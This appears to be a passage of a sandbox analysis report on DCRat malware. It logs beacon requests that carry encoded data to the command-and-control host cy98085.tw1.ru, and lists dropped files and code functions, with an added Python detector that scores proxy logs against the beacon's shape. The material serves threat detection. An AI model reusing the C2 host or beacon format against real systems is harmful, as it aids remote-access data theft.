            Source: global traffic | HTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&53aa3a9fb57d34776a6131d2274538b1=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 HTTP/1.1 | Accept: */* | Content-Type: text/csv | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 | Host: cy98085.tw1.ru | Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=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 HTTP/1.1 | Accept: */* | Content-Type: text/csv | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 | Host: cy98085.tw1.ru
            Source: global traffic | HTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVRkSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUehlXOXdlZkhlWPlzUZpGbtNGbxcVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXS5NGbShVWw4kRJtmVHRGc1clVnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUanpmT3FkaMBzYUx0cNpWT4NmaMdXUqlkNJlXW2hXbJNXS5VlVKl2TptmbjBTNXRmdO1WSzlUehlXOXd1ZjhlWPpUaPlGNyIGckdlW5p0QMl2ctNmdsZUSzYVbUl2bqlUNShVYqp0QMlWV65UdNpWT4RTaOBDND9UavpWS3xWbJdDcqlkda1mYKJEWTl2dplUeWdlW1xmMaVnVtlkNJNlW0ZUbUlnVyMmVKNETpdGVOlXSq5UMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQDM4UjY1gTZiFmY2EzMmNjZwMGMjNDMxEzY3QDZkJTZiwiIhlzMzMGOwgjY5ETOlJmMwgjZwEmNhRzYilTZlNTM3czN0IjNmFTNhJiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W HTTP/1.1 | Accept: */* | Content-Type: text/csv | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 | Host: cy98085.tw1.ru
            Source: global trafficHTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=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 HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: cy98085.tw1.ru
            Source: unknown - UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=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 HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: cy98085.tw1.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVRkSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUehlXOXdlZkhlWPlzUZpGbtNGbxcVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXS5NGbShVWw4kRJtmVHRGc1clVnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUanpmT3FkaMBzYUx0cNpWT4NmaMdXUqlkNJlXW2hXbJNXS5VlVKl2TptmbjBTNXRmdO1WSzlUehlXOXd1ZjhlWPpUaPlGNyIGckdlW5p0QMl2ctNmdsZUSzYVbUl2bqlUNShVYqp0QMlWV65UdNpWT4RTaOBDND9UavpWS3xWbJdDcqlkda1mYKJEWTl2dplUeWdlW1xmMaVnVtlkNJNlW0ZUbUlnVyMmVKNETpdGVOlXSq5UMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQDM4UjY1gTZiFmY2EzMmNjZwMGMjNDMxEzY3QDZkJTZiwiIhlzMzMGOwgjY5ETOlJmMwgjZwEmNhRzYilTZlNTM3czN0IjNmFTNhJiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIi
OiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: cy98085.tw1.ru
            Source: global trafficHTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=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 HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: cy98085.tw1.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVRkSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUehlXOXdlZkhlWPlzUZpGbtNGbxcVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXS5NGbShVWw4kRJtmVHRGc1clVnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUanpmT3FkaMBzYUx0cNpWT4NmaMdXUqlkNJlXW2hXbJNXS5VlVKl2TptmbjBTNXRmdO1WSzlUehlXOXd1ZjhlWPpUaPlGNyIGckdlW5p0QMl2ctNmdsZUSzYVbUl2bqlUNShVYqp0QMlWV65UdNpWT4RTaOBDND9UavpWS3xWbJdDcqlkda1mYKJEWTl2dplUeWdlW1xmMaVnVtlkNJNlW0ZUbUlnVyMmVKNETpdGVOlXSq5UMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQDM4UjY1gTZiFmY2EzMmNjZwMGMjNDMxEzY3QDZkJTZiwiIhlzMzMGOwgjY5ETOlJmMwgjZwEmNhRzYilTZlNTM3czN0IjNmFTNhJiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIi
OiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: cy98085.tw1.ru
            Source: global trafficHTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=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 HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: cy98085.tw1.ru
            Source: global trafficHTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=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 HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: cy98085.tw1.ruConnection: Keep-Alive
            Source: global traffic | DNS traffic detected: DNS query: cy98085.tw1.ru
            Source: dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002600000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cy98085.tw1.ru
            Source: dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002511000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cy98085.tw1.ru/
            Source: dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002600000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cy98085.tw1.ru/d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxk
            Source: portperf.exe, 00000006.00000002.2222640406.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002511000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002645000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.maxmind.com
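The beacon entries above give a proxy-log reviewer several traits to key on at once: an eight-hex-character `.php` path, several query-parameter names that look like MD5 digests, very long opaque parameter values, a GET that nevertheless carries `Content-Type: text/csv`, and a fixed, outdated Edge 96 User-Agent. The Python below is an added example, not code from the Joe Sandbox report or from DCRat, that scores log lines on those traits. The host, path and the query fragments are copied from the report; the scoring, the thresholds (`MIN_HEX_KEYS`, `MIN_BLOB_LEN`, `FLAG_THRESHOLD`), the tab-separated log layout and all four log lines are constructed for the example, the last two parameter values are shortened or repeated to a realistic length, and the assumption that another build of the same kit would produce the same URL layout is exactly that, an assumption.

```python
"""Score proxy-log entries against the C2 beacon shape logged above.

Added example: traits are read off the report's GET request; scoring,
thresholds and the sample log are the example's own constructions.
"""
import re
from urllib.parse import urlsplit

KNOWN_C2_HOSTS = {"cy98085.tw1.ru"}                 # from the report
PHP_PATH_RE = re.compile(r"^/[0-9a-f]{8}\.php$")    # shape of /d08a562e.php
HEX32_RE = re.compile(r"^[0-9a-f]{32}$")            # md5-looking parameter names
OPAQUE_RE = re.compile(r"^[A-Za-z0-9+/=_-]+$")      # base64-ish parameter values
UA_SUFFIX = "Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29"  # from the report
MIN_HEX_KEYS = 3      # assumption
MIN_BLOB_LEN = 512    # assumption
FLAG_THRESHOLD = 3    # assumption: traits needed before a line is reported


def score_request(method, url, content_type, user_agent):
    """Return (score, reasons); one reason per trait shared with the observed beacon."""
    reasons = []
    parts = urlsplit(url)
    if (parts.hostname or "").lower() in KNOWN_C2_HOSTS:
        reasons.append("known-c2-host")
    if PHP_PATH_RE.match(parts.path):
        reasons.append("8hex-php-path")
    # Split the query by hand so a '+' inside a value is not decoded to a space.
    pairs = [p.partition("=") for p in parts.query.split("&") if p]
    keys = [k for k, _, _ in pairs]
    values = [v for _, _, v in pairs]
    if sum(1 for k in keys if HEX32_RE.match(k)) >= MIN_HEX_KEYS:
        reasons.append("md5-like-param-names")
    if values and max(map(len, values)) >= MIN_BLOB_LEN and all(OPAQUE_RE.match(v) for v in values if v):
        reasons.append("long-opaque-param-values")
    if method.upper() == "GET" and content_type.lower().startswith("text/csv"):
        reasons.append("get-with-text-csv-body-type")
    if user_agent.endswith(UA_SUFFIX):
        reasons.append("fixed-edge96-user-agent")
    return len(reasons), reasons


def detect(log_text, threshold=FLAG_THRESHOLD):
    """Parse tab-separated 'method url content-type user-agent' lines (constructed
    layout) and return (line_no, score, reasons) for every line at or above threshold."""
    hits = []
    for n, line in enumerate(log_text.strip().splitlines(), start=1):
        method, url, ctype, ua = line.split("\t")
        score, reasons = score_request(method, url, ctype, ua)
        if score >= threshold:
            hits.append((n, score, reasons))
    return hits


UA_FULL = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) " + UA_SUFFIX
# Constructed: the first parameters are copied from the report; the last two are
# cut short / repeated so the blob reaches a realistic length without the full dump.
LONG_BLOB = "QX9JiI6ICNwgTNiVDOlJWYiZTMzY2MmBzYwM2MwETMjdDNkRmMlJCLiQTMkFzYkNTZilTMjFDOwczMyQTOiJzYiNWOll" * 8
BEACON_QUERY = (
    "yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU"
    "&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM"
    "&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY"
    "&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3Ii"
    "&1897097195362e5524f24dd6cd4188d9=" + LONG_BLOB
)
SAMPLE_LOG = "\n".join("\t".join(row) for row in [
    ("GET", "http://cy98085.tw1.ru/d08a562e.php?" + BEACON_QUERY, "text/csv", UA_FULL),
    ("GET", "https://www.example.com/api/v1/search?q=sandbox&page=2", "-",
     "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"),
    ("GET", "http://blog.example.org/0badf00d.php?id=17", "-", "curl/8.4.0"),
    # Hypothetical: same request shape to a different host, so the check does not rest on the hostname alone.
    ("GET", "http://203.0.113.10/aa11bb22.php?" + BEACON_QUERY, "text/csv", UA_FULL),
])

if __name__ == "__main__":
    for line_no, score, reasons in detect(SAMPLE_LOG):
        print(f"line {line_no}: score {score}: {', '.join(reasons)}")
```

The third sample line shows why a single trait is not enough: a benign `/0badf00d.php?id=17` scores one point for the path shape and is not reported, while the fourth line, which never mentions the report's host, still scores five on shape alone.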

            System Summary

            Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D6718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | File created: C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | File created: C:\Windows\SystemTemp\Crashpad\9e8d7a4ca61bd9
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D6857B
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D770BF
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D6407E
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D8D00E
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D91194
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D802F6
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D63281
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D6E2A0
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D76646
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D737C1
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D627E8
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D8070E
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D8473A
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D6E8A0
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D84969
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D6F968
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D76A7B
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D73A3C
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D80B43
